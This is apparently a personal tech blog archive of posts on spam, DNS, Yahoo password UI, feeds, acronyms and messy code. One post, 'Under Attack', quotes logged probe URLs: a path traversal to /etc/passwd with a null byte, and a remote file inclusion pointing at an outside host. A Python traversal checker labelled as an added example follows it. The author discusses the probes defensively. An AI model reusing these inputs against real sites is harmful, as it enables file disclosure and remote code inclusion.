Rainbowz Out My Window!
Just took these pictures outside my window an hour or so ago:
UPDATE: I took a bunch of photos from the set and managed to make a panoramic pic:
Silly Google Phrases
Every blogger has done a post like this. You know them, you love them, they are… the silly Google search queries people use to find your blog!
These are in reverse order of arrival, and the URLs are mostly pasted straight out of the referrer log. Without further ado:
- narc ftp port (Google UK) — I’m not sure I really want to know. Do I have an FTP daemon I’m not aware of? If so, it’s probably stuck inside the LAN, since I’m not forwarding anything unexpected.
- what a narc does to set up people — Did you really think it would be that easy? Us narcs have our professional pride, you know?
- acronym for narcs (Google Australia) — Do we really need an acronym here? “Narc” is a pretty short word already. What would be the acronym? “N”?
- zap+ro (Google Thailand) — I’d really prefer if you didn’t, thank you. I happen to live here in .ro, and I like it.
- pl poke data narc (Google UK) — Er… I don’t think I really want to know what that’s supposed to mean. Using Perl to poke data into my brain? No, thank you. Although, if you manage it, that’ll be a neat hack.
- short summary of the notebook — Before I did that search, I hadn’t known The Notebook (2004) was a movie (and a novel, apparently). So here’s a short summary, then: “It’s a movie (and a book).” Happy?
- why is vodafone website so shit? (Google UK) — Good question! Without knowing anything about their internal organization, I’d guess that most of it was their use of a very crappy technology (JavaServer Pages? That’s what the JSP stands for, yes?), which presumably was chosen because the rest weren’t Enterprise-y enough and/or because that’s what the consultants they hired to do the job “knew”.
- mysql “add a fucking user” — This search actually returns a very specific result from my blog, that being my “Going Insane From Work” post, which unfortunately, doesn’t actually answer the (implied) question. So, here it is: to “add a fucking user” to mysql, the command is: `GRANT <privileges> ON <database>.<table> TO '<username>'@'<host>' [IDENTIFIED BY '<password>']`. Alternatively, to leave the user at default privileges (that is, none), use: `CREATE USER '<username>'@'<host>' [IDENTIFIED BY '<password>']`. This, and more, can be found in the fucking MySQL manual, which you should’ve picked up like the rest of us do.
- arguments against alcoholics anonymous — Er… why? Oh! Oh! I got one: “I’m not a drunk, I can quit whenever I like!” There’s your argument.
- Finally, i didn’t know my friend was a narc — Well, neither did I. Which poses an interesting question: if neither of us knew, are you really my friend?
That’s it for this edition of “Silly Google Phrases”. One thing I’d like to mention, though — a lot of people have been finding my website by searching google for… narc.ro. I find this very curious, but ultimately, as long as people find what they’re looking for, who am I to judge?
Thank you all, and good night!
Spam, ReCAPTCHA, and Stuff
So if you’re a visitor here who’s ever at least thought of posting a comment, you’ll probably know I recently (about half a year ago?) switched away from Akismet to reCAPTCHA for my spam-blocking needs. ReCAPTCHA is nice, and the fact that they also make it possible for humans to help where OCR fails is a big bonus for them.
However, the fact that it’s one of the most common types of CAPTCHA means that it’s also the one under the heaviest attack, and that means there are spambots that have learned how to crack it.
As evidence of this, I offer the (dozens of) spam comments I just deleted from my queue (as I was typing this, another one just showed up). The major difference between this spam and the stuff that used to pass through Akismet is the length — these new spam comments are very long. This works in my favour, of course, since it makes it easy to figure out what to delete: if it takes a tap of the Page Down key to get to the end of the comment, it’s very likely spam.
However, if we disregard the content of the spam (which is easily changeable), we can see that it’s really quite a bad idea to rely on any kind of CAPTCHA by itself. It seems I have to echo the many others who have said that spam is a machine-generated problem with only human solutions.
Ultimately, every kind of anti-spam solution has drawbacks:
- statistical analysis solutions (think Bayesian filters) will have false positives and false negatives sometimes.
- distributed blacklists (like Akismet) fail because they’re blacklists — and enumerating badness is a failure waiting to happen[1]. On top of that, open blacklists are easy to poison, leading to… false positives, of course.
- CAPTCHAs, as a special class of solutions, fail because they rely on computers not being able to “read” as well as humans can — the problem being that some humans cannot read as well as a computer can; and also that computers are getting smarter all the time.
I’m sure there are other types of anti-spam solutions I haven’t enumerated, and likely they all fail on one point or another.
One of the best approaches to such problems is a whitelist-based approach, or enumerating goodness. This is much easier to do, since the number of honest commenters is likely much lower and much more stable than the number of potential spammers out there.
“But wait, narc, doesn’t that mean that I have to keep an eye on my moderation queue, to whitelist the allowed commenters?” Well, obviously, but you’d have to keep an eye there anyway to check for false positives, and to delete all the spam you’re getting. So there are no savings either way.
With that said, using a solution like reCAPTCHA can reduce the immense size of the moderation queue, which is a good enough reason to use it. But you still need to keep your eye on the ball, and you also shouldn’t forget that CAPTCHAs will keep out parts of your (potential) audience. I try to do that, and if I ever seem to have failed, I strongly encourage you to contact me and remind me.
Update: I’ve had to close comments on this post due to the fact that it got targeted by a bunch of spammers (who don’t seem to have much trouble with the reCAPTCHA). Meh.
QQSearch!
Inspired by Jon Eveland‘s qqint, I’ve produced (from scratch) a personal version written in PHP and using an SQLite backend that anyone can set up and use themselves.
I started by putting up some slightly rambly QQSearch documentation that should explain what’s what, and why. Because the docs came first, they may be slightly out of date. They are also slightly ahead of the current state of development, as aliases have not yet been implemented (though it should be reasonably easy to do so).
You can use a demo of QQSearch with the really dangerous bits removed (i.e. no adding and deleting URL mappings).
If you like that, you can go ahead and:
- download QQSearch v. 0.1 as .tar.gz (about 100 KB), or
- download QQSearch v. 0.1 as .zip (about 300 KB)
Short instructions for use: download, extract to the htdocs folder of a PHP-enabled (version 5.1 minimum!) webserver, and browse to it.
If you need more help than that, feel free to contact me and I’ll do my best to get you sorted.
Webmin, Oopsies, and the Fun of DNS
So, I must be the last person on the Internet to have heard of webmin — or, at least, the last person who administers a bunch of Linuxen to do so.
After installing it yesterday on Bast, I discovered, among other things, that webmin has a neat little interface to configure BIND. Since that was basically the one thing I hated having to manage on my own, I decided I’d give it a try — and boy, did it ever work nicely. I’ve managed to transfer the narc.ro zone from the shitty MS server to a nice, neat little BIND9-managed zone on bast.
On top of that, I’ve finally segregated *.narc.ro and *.internal.narc.ro, which makes the DNS a lot cleaner.
In other recent news, however, I did a stupid (this is where the “oopsies” part of the title comes in): I had to change Themis’s IP from 192.168.0.1 to .100 (well, I didn’t have to, I was just lazy), and… I forgot to change the port forward for the DNS. Which ended up breaking my e-mail deliveries, as well as most of everything else related to narc.ro, I’m sure. Luckily, since I also had a reason to change that forward, I caught it relatively quickly (yeah, it only took a couple of days, heh).
So if you were wondering why you couldn’t reach narc.ro, or why your RSS reader was having trouble getting updates, now you know. Aren’t ya glad?
The Ultimate Common-Sense Argument Against *AA Whining
Here’s a neat question for you: what do you think the most traded media on the Internet is?
Is it:
As it turns out, the answer is (e) None of the above. “The Internet is for porn” is not just a catchy show-tune. Note that I’m not referring to the most bandwidth consumed, the honor of which goes to spam — I’m referring to actual, user-shared, P2P trafficked media.
So if that’s true, then we can start to look at the RIAA/MPAA’s claims that “The Internet/downloads are destroying the [music/movie] industry”. By this statement, it should be impossible to make any money selling porn on the Internet, right?
…Yeah, and if you believe that, I’ve got a bridge to sell ya. I don’t believe I’ve mentioned this before here on the blog, but I work with porn every day as part of my regular job, and let me tell you: the only time the signups stop is when someone does something stupid to break them. Otherwise, they just keep coming.
So if free porn didn’t kill the pornography industry, what makes the *AA think that free music/movies are going to kill their respective industries? Perhaps they’re hiding some feelings of inadequacy?
Under Attack
(or, having fun with a public-facing Internet presence)
So, since I upgraded the main narc.ro site, I got a custom 404 handler in the bargain — one that emails me whenever it’s hit. Okay, so it initially sent 500 Internal Server Error, but I’ve fixed that part.
Anyway, the result of this is that I get a whole bunch of very fun emails when people try to hit pages on narc.ro that don’t exist, such as:
- http://www.narc.ro//gazelle/?template=../../../../../../../../../../../../../etc/passwd%00
- http://86.104.40.152/roundcube//bin/msgimport
- http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f
I hope I don’t have to tell you not to visit those links — they don’t do anything (except email me, which is annoying).
I’m particularly interested in the first on that list, which is also the most recent. The theoretical narc.ro/gazelle path would have been /opt/www/vhosts/www.narc.ro/htdocs/gazelle. Let’s count the ../es in the path our attacker tried — 13 of them. More than enough to get out of the 6-level deep path and into /. And I probably don’t have to tell you that /etc/passwd is a file you really want to guard pretty well — it has all your users in it (/etc/shadow has the hashed passwords, too, but that one’s protected so an ordinary user (or the apache user) would be unable to read it).
So, what protected me, in this case? Firstly, it was the fortunate fact that the script the attacker was trying to hit doesn’t exist; and second, that wherever I have scripts that are able to take user input for a path (for instance, img.narc.ro works like that), I’ve been careful to put in protection against relative path inputs like that one. http://img.narc.ro/../ just won’t work.
This is a semi-adequate level of protection for me, since I write my own scripts — I don’t have to worry about any mistakes made by anyone other than myself, and I’m pretty careful around this stuff.
But note that I am some random corner of the Internet almost nobody knows about, and I’m still getting attacked. That means no matter who you are, if you’re serving Web content, you must take precautions. And even if you’re the only developer on the system, you should still do your best to contain the threat. Defense in depth should be your key phrase. That’s why I’m currently looking into mod_chroot for my Apache2 installation. Your solution may be different, but have one, or at the very least, be aware that you will be attacked, and have some plan to recover from that if, or when, an attack is successful.
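As an added example (not code from the post or from any narc.ro script), here is the kind of check the paragraph on path inputs describes, written in Python rather than PHP: a resolver that keeps a `?template=` value inside the script’s directory (rejecting null bytes, remote URLs and anything that climbs out of the base), plus a classifier that runs it over logged URLs. The base directory is the one the post gives for gazelle; the three sample URLs are reconstructed from the post’s list.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Directory the post gives as the would-be location of narc.ro/gazelle.
BASE_DIR = "/opt/www/vhosts/www.narc.ro/htdocs/gazelle"

# Constructed samples modelled on the three URLs in the post (the 13 "../"
# segments of the first one are rebuilt rather than copied, so the count is exact).
SAMPLE_URLS = [
    "http://www.narc.ro//gazelle/?template=" + "../" * 13 + "etc/passwd%00",
    "http://86.104.40.152/roundcube//bin/msgimport",
    "http://www.narc.ro/gazelle/?template="
    "http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f",
]


def traversal_depth(value: str) -> int:
    """Number of '..' segments in an already percent-decoded path value."""
    return sum(1 for segment in value.split("/") if segment == "..")


def resolve_template(base_dir: str, value: str):
    """Map a user-supplied template name to a path that must stay inside base_dir.

    Returns (absolute_path, "ok") or (None, reason). Works purely on strings, so
    it needs no files on disk and can be run over a referrer log as well as live.
    """
    if not value:
        return None, "empty"
    if "\x00" in value:
        # The %00 in the first sample: a null byte meant to cut off any suffix
        # (such as ".tpl") that the script would append to the name.
        return None, "null byte"
    if "://" in value or value.startswith("//"):
        # The third sample: a full URL handed to an include(), i.e. remote file inclusion.
        return None, "remote URL"
    # normpath collapses "a/../b" and excess ".." lexically, which is what a check
    # wants; an absolute value replaces base_dir entirely in posixpath.join, so
    # "/etc/passwd" is caught by the prefix test below as well.
    candidate = posixpath.normpath(posixpath.join(base_dir, value))
    if not candidate.startswith(base_dir.rstrip("/") + "/"):
        return None, "escapes base directory"
    return candidate, "ok"


def classify_request(url: str, base_dir: str = BASE_DIR):
    """Return the reasons a logged URL's query parameters fail resolve_template().

    An empty list means no parameter looked hostile; it does not mean the request
    was benign (the roundcube probe has no parameters at all and passes here).
    """
    parts = urlsplit(url)
    reasons = []
    # parse_qs percent-decodes once, the same view a PHP script gets in $_GET.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            path, why = resolve_template(base_dir, value)
            if path is None:
                reasons.append(f"{name}: {why} (depth {traversal_depth(value)})")
    return reasons


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(url)
        print("  ->", classify_request(url) or "no hostile parameters")
```

The classifier is the piece a 404 mailer like the one in the post could call before deciding whether a hit is worth an e-mail; the resolver is the piece a script such as img.narc.ro would call before opening anything.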
A UI Experience: Yahoo! Password Change
I feel a bit like I’m picking on a retarded kid, but I’ve been asked for instructions about changing one’s password on a Yahoo! account, and I figured that was a good excuse to analyze some of the pitfalls of bad UI. Having just tried to find it myself, I have to say it’s not very easily discoverable unless you know what to look for, and that’s pretty hard for a non-programmer.
First, a caveat: I’ve only tried to do this in the context of accessing Yahoo! Mail. It’s possible that other Yahoo! applications make this process a bit easier, but I’m going to assume the person who needs this (friend of my uncle’s, I’ve never met her) is a typical user who doesn’t care about anything other than Yahoo! Messenger and Mail.
With that said, let’s see how to do it:
First, go to http://mail.yahoo.com/ — the easiest way to get straight to Yahoo! mail:

If you don’t have automatic login enabled, you will probably have to sign in now:

In the above picture, note the “Forget your ID or password?” link that can help you if you can’t remember those.
And now we get to the really bad UI: Yahoo! Mail “non-classic” (click for bigger screenshot):
I know, that’s not the whole UI, I’ve cropped a lot of it out, but the interesting part is in there. See what I’ve highlighted there:

When you click it, this is what you see:

Now, you have to figure out that the “Edit My Account” link is likely to have the password-changing option (maybe not that huge a logic leap — I’m not a user, I don’t know how they think). It’s right there:

The result? Erm, you’ll have to enter your password again:

This helps, I’m sure (for instance, if you have auto-login enabled and some idiot goes to Yahoo! Mail on your behalf, at least they can’t change your password, right?). But they can read your mail, and send mail as you. Oops.
On the other hand, the profile edit page appears to contain more sensitive information, such as home address, telephone numbers, and such. It would probably also contain credit card information, which is definitely something we don’t want an unauthorized prankster to see.
So, anyway, the result is you’ll be presented with this screen (click for bigger screenshot):
Which, among other things, contains this:

That’s right, there’s the Change Password link. It didn’t take long to get here, did it? Click it, and you get this:

After you fill out this rather standard password change form, you should be looking at this:

That’s it! Now, let’s see how much it took to get here:
- Two password prompts (one of which might not show up in some cases)
- Figuring out a UI element is actually a menu, and that it’s the one we want!
- Understanding that editing “my account” includes changing the password (as I said, maybe not so much of a logic leap)
The conclusion? It’s not too bad, but it could be better. I’d love to see this action — changing one’s password — be somewhat more easily discoverable without having to browse through a drop-down menu, but otherwise it’s pretty understandable once you spend a few minutes thinking about it.
And there’s the rub: you have to think about it. And it’s not in the obvious place, either — there’s an “Options” menu you might think was related, but it actually refers solely to the Yahoo! Mail options. I have no doubt a lot of people get hung up on this point: “I’ve looked everywhere and I can’t find it”. The profile menu is hidden away in the top-left corner next to the logo, and it looks like a greeting, rather than something with which to get stuff done. Further, there are so few options in that menu that they could all be shown directly below, like the “Sign Out” link is, and that might help a bit.
Alternatively, maybe the drop-down menu could be called “Profile Options” or “My Profile” or something, rather than “Hi, <first name>!”. That makes it look like website fluff rather than like an actually useful piece of user interface.
Oh, in case you’re wondering — I’ve removed my details from the screenshots mostly for clarity, rather than out of any fear of giving away any information. My “About Narc” page contains the personal info I’m okay with having out in the open, and you’ll probably note it’s pretty complete. I’m not that bothered by having random people know my personal information — I assume nobody really cares.
From Alex_Boly: Common Sense in Programming
I was just reading a post from Alex_Boly’s blog, and found this brilliant explanation of what programming common sense actually is:
[Common] sense is a very elusive concept. How do you express it, how do you explain it to those people violating it in such an unimaginable manner? How can they learn it, use it, teach others? How did you get into its possession?
Hard questions, with no answer. Until now, when I have finally developed a theory of common sense. It may be proven right or wrong, but at least it’s a theory that is, I believe, worth exploring.
My theory can be summarized as following:
- We start learning programming because we are attracted by it
- We continue to learn and read more and more because it’s more and more interesting
- The knowledge pieces we gather connect to each other
- The connections solidify in patterns
- The patterns become the second nature and the common sense is born
You can read the rest of Alex_Boly’s theory on common sense at his blog. It’s very much worth it.
WordPress RSS and Atom = WTF?
Okay, so, if you’re a subscriber to this blog’s RSS feed, I apologize from the bottom of my heart. Having taken the time to subscribe and read that feed, I have come to the conclusion that it is absolute, unfettered crap. It’s severely incomplete, obviously generated automatically, and ends up cutting a HUGE amount of the original post off, in spite of the fact that I specifically asked WordPress to include the complete article in its generated feeds!
Unfortunately, there didn’t seem to be any solution (other than, probably, getting a plugin to do the right thing instead). Until I looked closer…
Compare this:
Fig. 1: Ramblings of Narc RSS feed sample
To this:
Fig. 2: Ramblings of Narc Atom feed sample
That’s right, the atom feed is much, much better. Like, infinitely better. So much better, in fact, that it’s now the only feed I’m advertising for this blog. If there is demand, I will probably throw the Atom feed through FeedBurner and point people to that, but until then, the Atom feed, which rocks immensely, is king.
A:Visited (or, channeling Jakob Nielsen)
I posted a “dent” (God, is that a silly name or what?) recently on identi.ca about how I hate not being able to tell visited links from fresh ones. And then I had a look at this blog and realized it had the exact problem I was ranting about.
The reason for this is that I got this theme from elsewhere, and never really cared enough to look at it very closely.
But, if there’s anything that can get me out of my usual lazy stupor, it’s being (or being called) a hypocrite, so I’ve set out to fix my most obvious failing.
So I’ve added a:visited CSS selectors to all the important places I could find here, on the Ramblings of Narc, and the final result is reasonable, as far as I’m concerned.
As a result, I can now whine all I want about websites that don’t make any obvious visual distinction between visited and unvisited links. But wait, there’s more — I also have a (decent) solution, in the form of a bookmarklet I picked up a long while ago called “zap”. To use it for yourself, all you need to do is drag and drop Zap to your bookmarks toolbar. You can even click it for a live preview.
Oh, the wonders of Javascript bookmarks
Update: Oops, the wonders of Javascript bookmarks, indeed. Somewhere along the way I think WordPress probably mangled it. That’s what I get for not testing carefully enough. Use this link to get to it, instead.
Acronym Soup
Here’s one that should be entertaining — a listing of all the acronyms I come across on a daily basis, along with my opinion (or other tidbits) on them:
- PHP — originally “Personal Home Page”, now the recursive acronym: “PHP: Hypertext Pre-processor”. Not too painful to use, given the alternatives.
- PERL — “Practical Extraction and Report Language”. AcronymFinder also lists “Pathologically Eclectic Rubbish Lister”, which is reasonably accurate, from my experience with it.
- SQL — “Structured Query Language”. Not “Standard”. Unfortunately.
- SSH — “Secure SHell”. Uses SSL (see below). Very solid and reliable, in my experience.
- SSL — “Secure Sockets Layer”. A technology for implementing mostly-transparent secure data transfer.
- HTTP — “HyperText Transfer Protocol”. Stateless, Simple, and Stupid. Also, very useful.
- HTTPS — either “HTTP, Secure”, or “HTTP over SSL” (which, IMO, should be HTTP/SSL), depending on who you believe. See also HTTP, SSL (above).
- SFTP — “Secure File Transfer Protocol” (not to be confused with FTPS, which is actually FTP/SSL, and doesn’t have much traction in the real world), a service provided by (Open)SSH servers in addition to the shell service.
- AIM — “AOL Instant Messenger”. Crappy software, but with a third-party client like Pidgin is actually reasonable. See also AOL (below).
- AOL — “America OnLine”. Shitty company, well known for being asshole-ish towards its customers (known internally as “members”).
- Y!M — “Yahoo! Messenger”. Semi-crappy messenger service. Reasonably functional, though, and quite stable.
- GTalk — “Google Talk”. Another messenger service, this one built on Jabber/XMPP (see below) and made by Google, the “Don’t be evil” company. Not too evil.
- XMPP — “eXtensible Messaging and Presence Protocol”. An open standard for exchanging (instant) messages over an XML-like protocol. Speaking of which:
- XML — “eXtensible Markup Language”. I just love these X-acronyms, they always make me feel like I’m living in the future.
- IRC — “Internet Relay Chat”. Yes, people still use it. Some pretty awesome people, in some cases, as it turns out.
- APT — “Advanced Packaging Tool”. So far, the best package management tool I’ve seen. However, my experience is limited, so a grain of salt is recommended.
- PTS — “Pseudo-Terminal Slave”. What your SSH session spawns into: a terminal with no associated hardware (virtual or otherwise).
There are probably more I’ve missed, but these will do for the time being. How about you? What are the interesting/important acronyms that you work with every day?
Pimpin’ the Desktop
First off, apologies for the graphics-intensive post, but the subject matter demands it.
I’ve seen various pictures of desktops on the Internet, and they usually tend to be cluttered with a bunch of icons, sometimes clustered in such a way as to suggest organization, sometimes not so much.
What I haven’t really seen (well, I haven’t looked very much, either) is what I have:
Presenting… the icon-less desktop!
I assume that makes you think I use the start menu a lot? Far from it, my friend. I happen to consider the Start Menu “no man’s land”, for “those few brave souls who’ve dared to enter it… have never come back”. Instead, what I have is…
The auto-hiding Quick Launch (and more) toolbar. The icons up there are the tools I tend to use the most, though not in that order (or any order, really). The very important ones (for work) are Cygwin (for starting vpnc), PuTTY, and WinSCP. There’s also a Komodo Edit icon, but I don’t really use it — it’s my default editor, anyway, so who needs the extra link?
Because it’s the Quick Launch bar, most installers ask if I want an icon there, so it gets mostly the same type of mileage as the Desktop would. But wait, what’s that over to the right? Could it be…?
That’s right, it’s the Desktop. Now cleanly organized in menu/drawer-like fashion, it still has all those other links I might need once in a while (like, a My Computer to right-click), and can also be used to drag the icons from those applications whose installers don’t ask if you want an icon on the QuickLaunch bar.
There’s one minor problem, though — with this setup, the Recycle Bin tends to try to open automatically if you hover your mouse over it. And if it’s full of a whole lot of stuff, that’ll take a while. Plus, you don’t really see it, do you? Thus, that “Special” folder, er, “on” the Desktop.
It’s the source of a toolbar that sits right next to the Start button (didn’t notice it, did ya?) that contains only a shortcut to the Recycle Bin. So you can see it when it’s full, and can right-click, Empty away.
There’s also a pretty direct mapping between the Games folder and the Games toolbar/menu, but I suspect that’s obvious.
What I love about this is the fact that there are no desktop icons. I rarely see the desktop, anyway (outside of the times when I’m taking screenshots of it, of course), so it’s useless to keep anything there. And the background picture doesn’t get all cluttered up, either. What do you think?
ShittyCodeException
I’ve just had the immense pleasure of reading a bunch of code written by someone who is, or should be, a non-programmer.
Among other things, this piece of code (written in PHP) tends to take very roundabout routes to get where it’s going, its functions are mixed up with program logic (including such things as if(condition) function something() {};, which hurts my brain just thinking about it), and calls a Perl script to do something that’s eminently simple to do in PHP — querying a URL.
Thanks to an unattributed image found on Jeff Atwood’s blog, I can now express what the person writing this code should have been seeing as he wrote it:

Because that’s what was happening in my brain as I was reading it.
Now, I can appreciate code reuse, and the fact that the Perl script this one is calling is written mostly by myself gives me a nice ego-boost, but I’m questioning the validity of the current approach.
Firstly, what’s the point of having someone who is so obviously not a programmer write a bunch of code when I and my co-workers are generally available throughout the entire Toronto workday?
Secondly, does anyone doubt that this piece of code will end up having to be supported by us, the same people who should’ve been asked to write it in the first place? As evidence of this, I present the fact that I was the one asked to “fix it”. All I know is, at some point, I’m going to end up having to do some more in-depth maintenance on this code, and I’ll end up rewriting the whole thing, top to bottom. It’s just that bad.
And don’t even get me started on the excess trailing whitespace I just removed by saving the file. Or the shitty indentation that’s sometimes done with spaces, and other times with Tab. And even when done with spaces, it’s inconsistent between two spaces, three spaces and four.
I just noticed another thing: it calls mysql_free_result() at the very end of the application. How clever! It’s as if the “programmer” didn’t realize it would be done automatically the moment the script ended execution.
I’m also curious if the person who wrote this, ostensibly someone with the username “tony”, can even speak English. The reason I’m asking is this comment here: “Retrive Form Value and Assosate Vlaue for Xsell ID”.
Fun stuff, isn’t it?
Why This Hatred For The Shift Key?
You’ve probably seen it — heck, you’ve probably done it yourself, many times. Almost everywhere you go online, if comments are available, or if there’s any kind of open forum, you will see these posts:
this is my opinion: i think [X] should be [Y], [Z]
Now, I’m very specifically not trying to draw attention to the content of the post, because some number of them are very decent, and the rest are mostly ignorable. No, what I’m specifically looking at is the writer’s apparent hatred for the Shift key on his keyboard. With the exception of the [X], [Y] and [Z] I used as placeholders, that post has no uppercase characters whatsoever.
So, my question is, why? Usually, the answer I get is “its extra effort to use the shit^Hft key, and im too lazy”. I don’t buy that. I’m possibly the laziest person I know, and to me, it’s harder not to use the Shift key. It actually takes more mental effort to write like that than it does to write with proper capitalization, punctuation, and spelling (typos notwithstanding). And I’m sure my readers (all two of you) appreciate it.
So why do we see so little capitalization? What is the hatred for the Shift key? Are we moving towards an e. e. cummings-style Internet, where the Shift key is banned, or limited only to articles on media websites like CNN.com? Same for the apostrophe, and (in extreme cases), the period. What’s going on here?
